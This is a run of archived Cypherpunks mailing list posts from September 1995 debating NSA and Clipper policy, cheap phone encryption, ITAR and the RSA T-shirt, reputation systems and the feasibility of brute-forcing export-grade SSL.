not exactly what I said above).  In particular, he mentioned GSM in Europe
and its success... of course, that doesn't count as strong encryption with
the keys evidently being no better than 40 bits worth, but it's a lot
better than calling in the clear from your cellular phone.  He indicated
that Europe has embraced GSM and the US has not (yet) embraced anything
equivalent (about which more below).

>                                           Clipper, the closest the
> agency has come to creeping out of the darkness of their coffin,
> was a total fiasco.

Clipper wasn't a fiasco from the gov't's point of view if you look at what
it prevented rather than what it achieved.  By now the DES-based AT&T
encryption box might be the US standard if the Gov't hadn't intervened by
"incentivizing" them around the time of the Clipper roll-out.  It was
ready to go and was already in production when Clipper got rushed up.  As
it is there is now no standard and most traffic is still in clear.  If
this doesn't reflect a credible and <practical> understanding of how the
market works, what would?  Of course this one can't completely be laid at
NSA's door, but it's convenient to think of them as the fount of US crypto
policy decisions.

>              you see, there is far more to be gained from widespread
> encryption than is to be lost from it.

Agreed.

	Jim Gillogly
	Trewesday, 13 Halimath S.R. 1995, 01:26




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 18:52:47 PDT
To: cypherpunks@toad.com
Subject: maximizing cryptographic return
Message-ID: <199509040149.SAA01359@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


the question of the cost-effectiveness of  phone encryption was raised by 
my other message. I would like to question how cheaply good encryption
could be done on phones, with a poor quality microprocessor. most on
this list are aware of the idea that good encryption is often used
to send a low-bandwidth session key, which is then used to encrypt
that session using a less sophisticated but less computationally-demanding
algorithm. hence you seem to have good security at a computational
price that is less than encrypting everything with the secure protocol.

I was wondering how secure the following algorithm would be for phone
calls: suppose that at the beginning of each session, the random
key is traded using RSA or some other very secure approach. the
key is a *random bit width*, say 100-6000 bits. now, my question is,
I wonder if some very cheap algorithms, in terms of computation time,
could be used for the "on the fly" encryption of the voice using those
bit. would XOR with the pad be totally out of line? 

the situation is such that trivial algorithms such as XOR with  *unlimited
cyphertext* can be broken quite trivially. but it seems to me this
dogma that "XOR is WEAK" is based on the premise that you have a huge
amount of cyphertext to play with. take away this premise, that you
have a session key that is guaranteed to really give you very little
cyphertext, do these supposedly "weak" algorithms then become pretty
secure?

what I am getting at is that it seems there is this frequent assumption
that "good cryptography for on-the-fly encryption means you need huge
computational bandwidth". I wonder how true this really is. can you have
a situation where you spend a lot of time computationally negotiating
the *random one time pad*, but then have a fairly weak algorithm doing
the on-the-fly encryption with the random pad?

IMHO this would be the holy grail for phone hardware. as I wrote, you
are already going to have something approximating the power of a low-
bandwidth microprocessor in a phone. now imagine it took a long time
to send the key at the beginning, but that once traded it was no 
big deal-- real time communication using even "weak" algorithms.

what I am suggesting here is that we can get encryption for almost *no
additional cost* over existing phone hardware. and I am suggesting that
the main hurdles to encryption are political, not technical.

again, I wonder if "weak" encryption schemes are really that weak if they
are only used on short cyphertexts and if you have a good, secure
OTP (one time pad). I think it may be a delusion that you must have
a huge amount of computational bandwidth or have to encrypt every bit
using state-of-the-art, computationally-demanding algorithms to have 
extremely secure on-the-fly communications.

p.s. can someone give a brief summary of the Nautilus and PGP session
key / code frameworks?

p.p.s. 

a few footnotes in regard to the previous article. widespread,
seamless phone encryption is the NSA's absolute worse nightmare. everything
they are doing to prevent cryptography can be thought of as trying to
avoid this particular reality configuration. pay special attention how
they approach the issue and it will tell you what they fear the most,
and what they are trying to do to prevent it. 

also, Bob Morris said in his talk, acc. to Gillogly, that Europeans
*were* willing to pay for encryption in their phones, but those in the
US weren't. please expand on that little nugget!! how did you come
to that conclusion? why are americans fundamentally different than
europeans in regard to the value of encryption? if humans want the
same thing in most markets (as the situation of international product
marketing generally seems to suggest) does it make you think
that something besides the desirability of crypto is at stake here
in the localities, such as *politics*?

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 19:15:32 PDT
To: jim@acm.org
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID: <199509040212.TAA03591@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JG:
>Rather than finding ways to justify and maintain current budgets     
>and bureaucracies, why not just cough up the peace dividend?  

taking money from a bureacracy is like the exact opposite of taking
candy from a baby. but hell, maybe you could get a job as a spook
in their dark tunnels and "show them the light" so to speak. <g>

>I misstated his point to some extent here.  

oh right, any perceived boneheadness on the part of a premiere spook
is surely in the eye of the beholder <g>

>  He indicated
>that Europe has embraced GSM and the US has not (yet) embraced anything
>equivalent (about which more below).

well, thanks for clearing up the assertion but I stand by my rant.
(and BTW, thank you for the wonderful opportunity, one must prize every
opportunity to get one's blood boiling to know one is alive). the
US may very well not have "embraced" any encryption standard because
the NSA is trying to THROW A @#$%^&* WRENCH INTO ANY STANDARD THAT
IS DEVELOPED. that is EXACTLY WHAT CLIPPER WAS AN ATTEMPT TO DO.

y'know that we MAY HAVE WIDESPREAD ENCRYPTION BY NOW if the NSA has
not continually interefered with what is normally a NATURAL PROCESS
of standards creation in the technological community. Clipper is
a black, black mark not only because of what it tried to *introduce*,
but also of what it tried to *replace*.

again, the fact that we do not have widespread encryption in the U.S.
acc. to the NSA reminds me of the anecdote of the murderer going before
the court and stating that he deserved leniency because he was an
orphan. THE NSA HAS TRIED TO MURDER CRYPTO IN THE U.S. and then say,
"gosh!! there's no crypto!! no one has it!! therefore, no one wants it!!
why is everyone so angry when we tried to keep it from everyone when
nobody wants it"? @#$%^&*!!!

again, I suggest that the lack of crypto in the US is due to a 
*political* situation, and nothing else. the NSA of course would like
to deny that, and justify the *political* situation based on something else
(such as that people don't really want encryption or that it is not really
in the nation's best interests)
 
>Clipper wasn't a fiasco from the gov't's point of view if you look at what
>it prevented rather than what it achieved.  By now the DES-based AT&T
>encryption box might be the US standard if the Gov't hadn't intervened by
>"incentivizing" them around the time of the Clipper roll-out. 

exactly. THE MARKET COULD HAVE BEEN MATURING LONG AGO INSTEAD OF 
THROWN INTO CONFUSION.  we could have been on the path to improving 
encryption capability. and Clipper is only the product that we *saw*
in front of the world. did anything in the Clipper announcement talk
about the government collusion with AT&T? it is patently obvious that
the NSA has long worked behind the scenes to try to sabotage crypto,
and that Clipper was only the most desperate instance that we *heard*
about.

of course, when there is widespread crypto the NSA will probably try
to justify its existence based on the widespread crypto in the world,
and take credit for its introduction. "why, after all, Clipper was
a major step in introducing good encryption to the masses".  @#$%^&*

> It was
>rady to go and was already in production when Clipper got rushed up.  As
>it is there is now no standard and most traffic is still in clear.

indeed!! true progress!! the government has accomplished its mission
of sabotaging privacy!! so Clipper is a tremendous success in sowing
fear of the NSA into every American!! in throwing the standards process
into total confusion!!

JG, let me ask you a question. imagine there was some foreign government
agency, say of a totalitarian government, that wanted to prevent the
"spread of cyberspace" around the world. don't you think they could
be quite effective in  killing the Internet as it was growing? it would
be quite trivial to insert agent-provacateurs into all the open 
standards-making Internet conventions. where would we be now if this
happened?

cryptography is very intrinsic to cyberspace, and it would be quite
ubiquitous now if it werent for the reprehensible covert and overt 
NSA wrench-throwing acts. the NSA is sabotaging the natural growth of 
cyberspace, uneqivocally. I hope that every person in the NSA who
reads about Netscape or uses it, the Web, or the Internet,  hangs hi/her
head in shame, that he worked in an agency that helped work *against* the 
reality that created these wonderful embodiments of freedom in 
communication.

>>              you see, there is far more to be gained from widespread
>> encryption than is to be lost from it.
>
>Agreed.

actually, to tell you the truth I don't consider that a given. it is
very well possible that a huge advantage shifts to the terrorists of
the world. it very well may be!! but is anyone actually trying to
unbiasedly *answer* this question with honest research? of course
not. the NSA, the FBI, the whole law enforcement community is in
total CYA mode. we have Freeh actually utter at a press conference,
"would you feel the same about strong encryption if your daughter
was kidnapped by a pedophile?" or whatever his little @#$%^^&*
phrase was....anybody remember that slimy epithet of his?

for god's sake, could someone in the government do a study of 
what would *actually happen* if there was widespread encryption,
instead of letting the NSA's apparent default idea of "apocalypse now!!!" 
rule the whole debate?? the NSA is always talking about "the right
to communcation balanced with the needs of law enforcement", but have
they ever determined what in fact the costs are to society at large?
beyond simply ASSUMING that if a policeman complains that he can't
tap a phone line, that the world is really going to end tomorrow?!?!

has it ever occured to law enforcement agencies that widespread 
encryption may actually make their lives *easier*?? I could see a
situation where this is possible. the police routinely say, "sorry
ma'am we can't do anything because our hands are tied". if the police
and our government were prevented from any intervention into any
area involving cyberspace, perhaps both society and the police would
breath a lot easier!!

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 3 Sep 95 19:42:08 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <9509040238.AA04342@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?
> 
No, that was his kid!  Imagine his chagrin!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 17:35:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Joel's RSA-t's
In-Reply-To: <m0snW0o-0001puC@wittsend.com>
Message-ID: <9509040035.AA28573@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike writes [re: Perl-RSA T-shirts]:
> 	I just have one problem though...  If these things are classified
> as a "munition" aka a "weapon" by da fed's how does that affect us down
> here in good old Georgia where our legislature has passed a law making
> it a crime to be in posession of a weapon anywhere within a hundred yards
> or so of school property.  

Strong crypto is considered to be a munition *for purposes of U.S. export
controls*. With respect to possession within the U.S., there aren't any
laws stopping you from waving strong cryptography around wherever you like
(at least, not yet).

-Futplex





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 3 Sep 95 18:19:37 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950903211644.15206B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 3 Sep 1995, Vladimir Z. Nuri wrote:

> was a total fiasco. the self-destructing director of NSA whats-his-name
> who as running for that FBI position or whatever is another example of how 
> the inbred spook society has difficulty dealing with anything outside
> their artificial reality.

Give this man a prize.


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 08:56:12 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Timothy C. May wrote:

> At 10:56 PM 9/1/95, Buford Terrell wrote:
> 
> >If you've ever watched Not_at_all_Funny Home Videos or any of the
> >American Urinal school of tabloid television, you soon start feeling
> >that the real threat to privacy is not the guvmint, but all of
> >the yoyos with their little cam corders running around pointing them
> >at people.
> >
> >Security cameras in ATMS and at airline ticket counters do more
> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't
> >protect you from them. (and usually neither will the courts).
> 
> I absolutely agree with this, though this doesn't mean I'll stop worrying
> about the government's plans for key escrow (GAK), about limits on key
> lengths, or about other efforts to thwart strong security.

I, of course, know of the "dislike" of GAK here.  I am curious to know, 
however, if the "dislike" is because government would have access under 
any circumstances or if the primary worry is that government will cheat 
and get access when most would agree that they shouldn't (either by the 
judge "cheating" or a TLA stealing it).

In other words ... if it took agreement by a review board composed of 
non-LEA members of this list, would the escrow be acceptable??

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 08:55:48 PDT
To: cypherpunks@toad.com
Subject: Zimmerman's statute
In-Reply-To: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
Message-ID: <Pine.D-G.3.91.950903212711.8430C-100000-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Alan Westrope wrote:

> On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
> 
> > I think he would have to be charged first.  Have I missed something?
> > PS when does the statute of limitations run out?
> 
> June '96.  Zimmermann and Dubois appeared on a local talk radio show
> recently; a friend happened to catch the program, taped it, and played
> excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

I wouldn't be so sure.  There are lots of "creative" ways to, in effect, 
extend the statute.  My personal sense is that DOJ eventually wants to 
get this over with, so presumably would not attempt to be so "creative."

The "usual" statute of limitations for federal crimes is 5 years, but 
conspiracy, RICO, bank fraud, tax offenses, and no doubt others that 
don't occur to me right now, muddy the 5 year statute.  Bank fraud, for 
example, has a 10 year statute.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Sun, 3 Sep 95 04:45:46 PDT
To: cypherpunks@toad.com
Subject: A bold ssl idea ?
Message-ID: <199509031145.VAA12843@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Having watched the discussions of recent of the SSL bruting, it occured to
me that a variation could also be useful.
I understand that setting up RC4 keys is slower that testing for the correct
key (I may have misuderstood this bit).
As a company using SSL can ahve all it's SSL traffic sniffed, from multiple
people accessing, a log can easily be built of message/keys.
Is it considered practical to modify the brutessl code to have multiple
message data, and test each against a key from allocated key space ?
If so, this may mean that perhaps 3 message can be tested against a single
in the time two single keys could be tested against one message.
An an attack scenario, this is a hell of a lot more "efficient" than current
trials have been. I realise this could also be considered a bit of target
for the main purpose of demonstrating weaknesses, and improving techiquess.
My thoughts, anyway - i hope they make sense.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Sep 95 21:52:26 PDT
To: cypherpunks@toad.com
Subject: Re:  pseudonyms & list health
Message-ID: <199509040451.VAA23173@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" <vznuri@netcom.com>
> hence, what I am suggesting is that one
> of the "stable attractors"  that TM is always talking about
> may be a reality in which people pool most of their accomplishments
> under a single nym. furthermore, they will wish to avoid conflict
> with other nyms in respect to attribution. 
> isn't this, functionally, the equivalent of the supposed
> anti-cypherpunk "true names"?

An interesting point.  I have long wished that there would be a form of
"credential certificates" which people could give as special signatures
on other people's public keys.  Then using Chaumian credential technology
it would be possible to anonymously transfer these credentials from one
pseudonym to another.

This is not a perfect solution, of course.  Much reputation is informal
and simply resides in the opinions held in people's minds.  But perhaps
if a more structured solution like this became widespread it would help
to prevent the "concentration of reputation" which Vlad describes.

Along with the usual flames, I occasionally get messages saying nice
things about postings I have made, and I sometimes save these in a file
called "praise".  Here are some excerpts:

> Again, thanks for posting some useful information that
> actually has *direct relevance to crypto*.

> I really enjoyed reading this.  It was well written and comprehensive. 
> Thanks for sharing it. 

> Nice post!

I certainly appreciate these kinds of comments, but it would be even
more useful if such messages were expressed as the kinds of
certificates I am describing.  I wonder whether people would be willing
to use a program which would let them issue such "reputation
signatures" of various kinds, and display the signatures which were
present on keys.

Discussion of such schemes has often bogged down in considering the
various categories or types of credentials people might want to give.
This is somewhat analogous to the "rate-the-net" schemes we have talked
about where a similar issue arises if we try to mark pages with a whole
range of characteristics so people can judge whether they should let
their kids read them.  Perhaps the solution needs to be found in
simplicity.  SurfWatch (as I understand it) gives a simple "thumbs down"
to selected web pages.  Maybe a simple "endorsement" would be useful as a
reputation credential without trying to identify exactly what it is about
the person you are endorsing.

I could see such a system initially being piggybacked on PGP keys (the
signatures would not be understandable by PGP though), although for
Chaumian credential transfers the keys have to be specially structured
and that would require a new approach.

Who would be willing and/or interested enough to use such a system if it
existed?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 3 Sep 95 19:03:26 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID: <Pine.SV4.3.91.950903215715.6268B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


"Just cough up the peace dividend".

There is no ppeace dividend. There is a massive eco-spill of government 
debt;  quite possibly larger than the GNP capacity of the American 
economy to repay anytime in the next century.

The debt will be bankrupted, in some stealthy manner, hidden by masses of 
smoke and mirrors. Nothing new here - it's  about the only thing that 
works. For the mosrt recent examples, read up on FDR's confiscation of 
gold in (?) 1933.  Or read the detrails of the currency changeover 
effected by the occupation authorities in Germany (1947 or 1948).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 21:56:43 PDT
To: cypherpunks@toad.com
Subject: Clinton's Black Helicopters Over My House!
Message-ID: <ac6fd3aa0202100430a8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


ObConspiracy content: high.

They are coming to take me away, take me away!

Clinton's black helicopters are swooping low over my house.

What should I do?

Yes, this has nothing to do with coding in C, or even coding in Java, but
it's too good a story not to share with you.

My hilltop house, in the Santa Cruz mountains, lies directly between
Monterey and San Jose. His Excellency is landing tonight in
Monterey--probably has just done so, judging by the sudden increase in air
traffic--to dedicate tomorrow a "defense conversion" of the former Fort Ord
to "Cal State Monterey Bay," a new state college. (In California there are
three tiers of colleges: the 9 campuses of the University of California
system (Berkeley, UCLA, UCSC, UCSB, UCSD, etc.), the twenty-some "Cal
State" schools, and some ungodly number of Community Colleges.)

Anyway, lots of choppers flying directly over my house, at fairly low altitude.

Maybe I could spell out a Cypherpunks message in white stones in my
driveway, or maybe just a rose? He'll be choppering from Monterey to
Alameda tommorrow, after lunch, so I need to think of something to prepare
for him.

I'm tempted to try to take a photo with my telescope, but the choppers
flying with him might think I had a Redeye or Stinger or something from the
weapon shops of Isher, and send me back at least a visit by the
Praetorians, so I'll avoid "looking dangerous" in my back yard as the
choppers pass overhead.

(I find it hard to believe what the scribblers are saying, that this is the
first visit by a sitting President to Monterey in 100 years. What with
Carmel and Big Sur nearby, kind of hard to believe, eh?)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 22:07:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Wearing RSA shirt to school
Message-ID: <ac6fd726030210040224@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Grumpiness warning: I have held my tongue the past few months as all of
these "this t-shirt has been declared a munition!!!" messages went out, but
I can hold my tongue no longer.


At 4:43 AM 9/4/95, Futplex wrote:
>I wrote:
>> With respect to possession within the U.S., there aren't any
>> laws stopping you from waving strong cryptography around wherever you like
>> (at least, not yet).
>
>----
>...and in private email, Jim Ray pointed out that showing the shirt to a
>foreign national might technically violate ITAR...

Nope, no more so than letting a foreign national read Schneier's book is a
violation of the ITAR. If you dispute this, ask whether Schneier's book is
banned from export (the book, not the optional diskette). It isn't. Nor are
other cryptography _books_ banned from export.

I'm not minimizing the issue of export of machine-readable code, as in
diskettes. But to claim that a blurry, printed on cotton "barcode" is even
remotely in the same class as exporting a workable set of cryptographic
system routines, or that letting a furriner merely "gaze upon" this blurry
barcode, is a violation of the ITARs is laughable.


>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>flashing it at a furriner could constitute a violation. Thanks for the
>correction.

No. No more so than "flashing" a copy of a crypto book would constitute a
violation.

>
>The gist of my previous message remains: No local or state authority in the
>U.S. (of which I'm aware) classifies strong cryptography as a munition,
>weapon, etc. I haven't heard of any restrictions on transporting crypto
>across state lines, either. Unless the Feds start cracking down on high
>schools, or the Perl-RSA shirt somehow violates some school dress code, (gang
>colors ? ;)  the original questioner need not fret about his son wearing the
>shirt to school.

It was this series of posts about whether wearing the "munitions t-shirt"
near schools was a crime or not that made me think the silly season had
arrived. If the t-shirt is a munition, and books are munitions, then
libraries must be real "ammunition dumps," ready to explode at any minute.
News at 11.

Let's get real.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 3 Sep 95 15:20:24 PDT
To: cypherpunks@toad.com
Subject: Re: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <42d9lh$mjf@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509031145.VAA12843@oznet02.ozemail.com.au>, lyalc@ozemail.com.au (lyal collins) writes:
> Having watched the discussions of recent of the SSL bruting, it occured to
> me that a variation could also be useful.
> I understand that setting up RC4 keys is slower that testing for the correct
> key (I may have misuderstood this bit).
> As a company using SSL can ahve all it's SSL traffic sniffed, from multiple
> people accessing, a log can easily be built of message/keys.
> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?
> If so, this may mean that perhaps 3 message can be tested against a single
> in the time two single keys could be tested against one message.
> An an attack scenario, this is a hell of a lot more "efficient" than current
> trials have been. I realise this could also be considered a bit of target
> for the main purpose of demonstrating weaknesses, and improving techiquess.

  This technique has been discussed before.  It will not work because
the 40-bit export version of SSL actually uses 128 bit keys, with 88 of
the bits transfered in the clear.  The extra 88-bits act as a "salt" to
the key.  This defeats attempts to do a single key space search for 
multiple messages.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 22:58:32 PDT
To: cypherpunks@toad.com
Subject: Reputations and Reading Preferences
Message-ID: <ac6fdc45050210043624@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(This post has a second part, "Using Web Sites to Get Distributed Ratings,"
which you might want to read even if the first part looks uninteresting.}


Hal has some interesting comments, as usual, about how positive feedback
about authors can be integrated into mail readers and news readers. (Or at
least I took Hal's post as a jumping off point to think about these
issues--again.)

I've given this some thought recently, but have reached no firm
conclusions, except: it's probably not needed by most of us.

That is, I have little interest in what others think. If the herd votes
that "America's Funniest Home Videos" is their favorite program, or that
Jackie Collins is their favorite author, who cares? At least I don't. I
don't read stuff on the basis of a "beauty contest." I suspect the same is
true of many others.

But Hal was perhaps thinking in terms of the more sophisticated approach of
creating scoring systems in which a matrix R[u,v] is created, where each
element corresponds to the rating of u given by v. On the Cypherpunks list,
for example, with more than 500 subscribers, each of the 500 might have a
rating of perhaps 100 of the active posters, maybe only the 20 or 30 most
active and memorable posters. (That is, many of you 500 readers would not
have a meaningful entry, just because you have posted so little.)

And more sophisticated models take into account one's reputation given to
the views expressed by others. That is, some of those R[u,v] are
discounted, some are held in high esteem. This results in a further
weighting of the reputations. As an example, Madonna gives a good rating
(0.8) to Da Dogg Pound, but I dislike Madonna and her taste, so I weight
her rating accordingly.

And one can imagine scoring systems in which cumulative ratings are
considered. E.g., a lot of people whom I respect like the works of Thomas
Pynchon, so I'll give him a try.

(I use a simple scoring system in YA-Newswatcher, though it needs more
work, IMO.)

Things rapidly spin out of control, in terms of the communication needed,
the difficulty of getting participation (like a lot of polls, the most
thoughtful often are the least likely to respond), and so on. A few years
ago on the Extropians list this was a hot topic, and various "rating
systems' were proposed. I recall a particularly complex scheme by Alexander
Chislenko which purported to solve this problem...unfortunately, it still
looked to me to have the essential characteristics of a beauty contest.

Fortunately, I can't see the need. Why not? And what's the better alternative?

Here's a recipe which seems to work pretty well, and not just for me:

* Apply filters based on one's own likes and dislikes. Killfile some
posters, skip some threads, etc.

* Periodically get inputs from others that one respects, a la book
recommendations, movie reviews, etc.

This effectively generates what the mass rating scheme would generate,
albeit not identically (how could it?). One's favorite posters get read,
and one's favorite posters can make some recommendations of other authors
one should look at. Informal, but with many emergent advantages.


Using Web Sites to Get Distributed Ratings

Concretely, one way to do this is for people to do what Eric Blossom is
doing with his "Cypherpunks Lite" mailing list. Or with the Web archives
that Todd Masco has been running, and that Jay Campbell just started.

Imagine: Rudy the Rater sets up a mail-to-Web-site archive, using whatever
these folks above are using. Except, he screens the stuff to separate the
bad from the good, using whatever criterion he thinks is right. People
either use his site, or don't. (A Web site has some logistical advantages
over subscribing to various mailing lists which do the same filtering.)

Other services emerge with differing rating criteria, different aesthetic
standards of goodness, or even different interests. (Some sites could
filter out all of the political posts, others could filter out all the
programming posts, etc.)

Readers could pick the sites they wish to read, and simultaneously be
exposed to authors they might have otherwise overlooked. The authors they
like, and the filtering of the site operator, create a "clique" (as in math
terminology) that effectively is similar to the vector weighting scheme
present in the R[u,v] scheme.

An advantage of the distributed site model over the R[u,v] model is the
lack of any central coordination, the market anarchy of the process.

Shared kill files are another possibility. As kill files become more
commonly used, they may be traded around, weighted in the same way as
described above.

Again, I claim that an adequate and workable solution is not to solve the
more general problem of everybody rating everyone else, but just of having
access to a limited number of killfiles from people one respects.

These approaches are doable today. Especially the distributed Web competing
"best of" sites.

I may do one myself! (If Jay Campbell lets me have Web stuff on his system.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 3 Sep 95 20:16:35 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: maximizing cryptographic return
In-Reply-To: <199509040149.SAA01359@netcom10.netcom.com>
Message-ID: <95Sep3.231607edt.994@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I was wondering how secure the following algorithm would be for phone
> calls: suppose that at the beginning of each session, the random
> key is traded using RSA or some other very secure approach. the
> key is a *random bit width*, say 100-6000 bits. now, my question is,
> I wonder if some very cheap algorithms, in terms of computation time,
> could be used for the "on the fly" encryption of the voice using those
> bit. would XOR with the pad be totally out of line? 
> 
> the situation is such that trivial algorithms such as XOR with  *unlimited
> cyphertext* can be broken quite trivially. but it seems to me this
> dogma that "XOR is WEAK" is based on the premise that you have a huge
> amount of cyphertext to play with. take away this premise, that you
> have a session key that is guaranteed to really give you very little
> cyphertext, do these supposedly "weak" algorithms then become pretty
> secure?

No, XOR is weak if used even twice.  If you XOR the two pieces of
cyphertext with each other, you get the two plaintexts XORed.  I'd
be willing to bet that the human ear can understand two audio signals
XORed.  Certainly with practice people can understand audio that has
been encrypted with frequency inversion.  Pre-encryption compression
would solve this, but XOR is still very weak.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 3 Sep 95 13:32:00 PDT
To: don@cs.byu.edu
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509030845.CAA00124@wero.byu.edu>
Message-ID: <199509032031.XAA22330@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


>   URL: http://home.netscape.com/info/sslref.html
> If anyone knows of any clones or foreign sources please speak up.

SSLeay (Eric Young's free SSL implementation from Australia) is
available from ftp.psy.uq.oz.au:/pub/Crypto/SSL.

For information on other cryptographic software available outside the
United States, see http://www.cs.hut.fi/crypto.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sun, 3 Sep 95 20:38:22 PDT
To: cypherpunks@toad.com
Subject: rump session papers
Message-ID: <199509040337.XAA15787@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I ran out of copies of my rump session paper handouts.  So, I put them on
my ftp server...

	ftp://ftp.clark.net/pub/cme/ps/

  cepp.ps ::	a couple of symmetric modes for block ciphers which
		I threw out for people to attack....

